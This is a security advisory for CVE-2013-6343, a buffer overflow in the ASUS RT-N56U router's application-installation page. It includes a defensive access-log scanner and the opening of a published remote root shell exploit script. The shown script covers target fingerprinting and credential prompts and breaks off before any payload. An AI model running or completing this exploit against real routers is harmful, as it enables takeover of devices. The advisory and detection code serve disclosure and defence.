Release date: 2014-01-21
Updated: 2014-01-23
Affected systems:
Asus RT-N56U 3.0.0.4.374_979
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 65046
CVE(CAN) ID: CVE-2013-6343
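The ASUS RT-N56U is a wireless broadband router.
In ASUS RT-N56U firmware version 3.0.0.4.374_979 and earlier, the installation of new applications is handled by the router's web server, and this installation process is susceptible to multiple buffer overflow vulnerabilities that can allow an attacker to execute arbitrary code in the context of the affected device.
<*Source: Jacob Holcomb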
*>
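A defensive check for the page and parameters this advisory's test script names (APP_Installation.asp, apps_name, apps_flag), added here as an example and not part of the original advisory or of Jacob Holcomb's code: it scans web access-log lines for requests whose apps_name or apps_flag value is oversized or contains non-printable bytes. The common-log-format input, the 64-byte threshold, the query-string placement of the parameters and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

VULN_PAGE = "/app_installation.asp"        # page named in the advisory (lower-cased)
VULN_PARAMS = ("apps_name", "apps_flag")   # parameters named in the advisory
MAX_LEN = 64  # assumption: real package names/flags are short; tune per site

# Request line of a common-log-format entry: "METHOD target HTTP/x.y"
REQ_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def suspicious_params(log_line):
    """Return [(param, decoded_length, reason)] for one access-log line."""
    m = REQ_RE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    if url.path.lower() != VULN_PAGE:
        return []
    findings = []
    # latin-1 maps each percent-decoded byte to one character, so len()
    # is the number of bytes the web server would receive for the value.
    for name, value in parse_qsl(url.query, keep_blank_values=True,
                                 encoding="latin-1"):
        if name not in VULN_PARAMS:
            continue
        if len(value) > MAX_LEN:
            findings.append((name, len(value), "oversized"))
        elif any(not 0x20 <= ord(c) <= 0x7e for c in value):
            findings.append((name, len(value), "non-printable bytes"))
    return findings

def scan(lines):
    """Return [(line_number, findings)] for every line with a finding."""
    hits = []
    for n, line in enumerate(lines, 1):
        found = suspicious_params(line)
        if found:
            hits.append((n, found))
    return hits

# Constructed sample log (documentation addresses, made-up values).
SAMPLE_LOG = [
    '192.0.2.10 - admin [21/Jan/2014:10:00:01 +0000] "GET /APP_Installation.asp?apps_name=downloadmaster&apps_flag=sda1 HTTP/1.1" 200 512',
    '192.0.2.77 - admin [21/Jan/2014:10:03:12 +0000] "GET /APP_Installation.asp?apps_name=' + "A" * 300 + '&apps_flag=sda1 HTTP/1.1" 200 0',
    '192.0.2.77 - admin [21/Jan/2014:10:03:15 +0000] "GET /APP_Installation.asp?apps_name=dm&apps_flag=%ff%fe%01 HTTP/1.1" 200 0',
    '192.0.2.10 - - [21/Jan/2014:10:05:40 +0000] "GET /index.asp?apps_name=' + "B" * 300 + ' HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for line_no, found in scan(SAMPLE_LOG):
        print(line_no, found)
```

Parameters sent in a POST body do not appear in access logs; the same length and byte checks would then have to run at a proxy or inspection point that sees the request body.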
Test method:
--------------------------------------------------------------------------------
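Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!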
#!/usr/bin/env python
from time import sleep
from sys import exit
import urllib2, signal, struct, base64, socket, ssl
# [*] Title: ASUS RT-N56U Remote Root Shell Exploit - apps_name
# [*] Discovered and Reported: October 2013
# [*] Discovered/Exploited By: Jacob Holcomb/Gimppy - Security Analyst @ ISE
# [*] Contact: Twitter - @rootHak42
# [*] Software Vendor:
# [*] Exploit/Advisory: ,
# [*] Software: httpd (Listens on TCP/80 and TCP/443)
# [*] Tested Firmware Versions: 3.0.0.4.374_979 (Other versions may be vulnerable)
# [*] CVE: ASUS RT-N56U Buffer Overflow: CVE-2013-6343
#
# [*] Overview:
# Multiple ASUS routers including the RT-N56U and RT-AC66U have the ability to install
# supplemental applications. This install process is handled by the routers web server,
# and is susceptible to multiple Buffer Overflow attacks.
#
# Vulnerable Web Page: APP_Installation.asp
# Vulnerable HTML Parameters: apps_name, apps_flag
# Vulnerable Source File: web.c of httpd code
# *Firmware versions prior to the tested version were vulnerable to this attack.
#
def fingerPrint(host, port, netSock):
    fprint = ["RT-N56U"]
    found = None
    print " [*] Preparing to fingerprint the server."
    try:
        print " [*] Connecting to %s on port %d." % (host, port)
        netSock.connect((host, port))
    except Exception as error:
        print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
        exit(0)
    try:
        print " [*] Sending fingerprint request."
        netSock.send("HEAD / HTTP/1.1\r\n\r\n")
        netData = netSock.recv(1024)
    except Exception as error:
        print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
        exit(0)
    try:
        print " [*] Closing network socket.\n"
        netSock.close()
    except Exception as error:
        print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
    for item in fprint:
        if item in netData:
            print " [!!!] Target system found in signature list - Result: %s [!!!]\n" % item
            sleep(1)
            found = item
    if found is None:
        print " [!!!] Server banner doesn't match available targets. [!!!]\n"
        sleep(1)
        exit(0)
    else:
        return found

def targURL():
    while True:
        URL = raw_input("\n[*] Please enter the URL of the router. Ex. \n>")
        if len(URL) != 0 and URL[0:7] == "http://" or URL[0:8] == "https://":
            return URL.lower()
        else:
            print "\n\n [!!!] Target URL cant be null and must contain http:// or https:// [!!!]\n"
            sleep(1)

def creds():
    while True:
        User = raw_input("\n[*] Please enter the username for the routers HTTP Basic Authentication:\n>")
        Pass = raw_input("\n[*] Please enter the password for the supplied username:\n>")
        if len(User) != 0:
            return User, Pass
        else:
            print "\n [!!!] Username cant be null [!!!]\n"
            sleep(1)

def basicAuth():
    auth = None
    while auth != "yes" and auth != "no":
        auth = raw_input("\n[*] Would you like to use HTTP Basic Authentication? \"yes\" or \"no\"\n>")